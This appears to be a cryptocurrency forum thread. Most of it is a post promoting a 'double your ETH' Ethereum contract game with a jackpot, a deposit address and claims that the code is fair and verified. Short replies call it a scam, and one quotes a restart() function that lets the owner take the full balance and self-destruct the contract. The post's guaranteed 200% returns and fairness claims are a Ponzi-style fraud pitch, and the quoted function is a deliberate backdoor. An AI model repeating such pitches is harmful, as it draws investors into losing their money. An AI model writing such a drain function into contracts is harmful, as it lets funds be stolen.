I like this idea, quite fresh!
Also please try mine - here you can not only double your ETH but also get a jackpot if you are the last person to deposit.
This game is simple to play. And yet it is different than most games here, because it gives you additional incentives.
Usually the last person who invests loses.
But in this game the last person to invest actually wins jackpot, that was collected from game's fees.
This way everyone is rewarded.
Also, this game will never stop.
https://i.imgur.com/UWFqAVF.jpgRules explained1.
You can play with any amount between
0.5 and
25 ETH.
2.
You enter the game by sending your ETH to the contract address:
0xb5aff01f3e820735fac9abb594dc9993cb9e5bd2The contract code is tested, verified and opened to the public.
You can see it here: http://[Suspicious link removed]/iUEuaL
This is to prove that the game is fair.
3.
You get
200% of your investment to the same account from which you sent.
4.
5% is collected to the Jackpot. During the game there might be significant amount of money in the jackpot.
5.
Who gets the jackpot? If noone contributed to the game for the last 6 hours, the jackpot is split between the last three players.
The last player gets 70%, the one before him gets 20%, and the third one 10% of the jackpot.
6.
When noone contributes for the 6 hours the game ends. The new game starts. Player, who is the first to play in the new game, will be getting 3% of all transactions till the game ends again.
So this game not only doubles your investment but also rewards you with a jackpot if you are one of the last players to play!
The fee is only 3%.
And what is most important - in this game you will not be afraid to be the last one to invest, because the last one wins the most!
Good luck!
The "new" game posted by SmokeJoe appears to be a scam ? you could run away with all of it
Please keep this out of the ETHStick thread, it is confusing
function restart() {
if (msg.sender == mainPlayer) {
mainPlayer.send(address(this).balance);
selfdestruct(mainPlayer);
}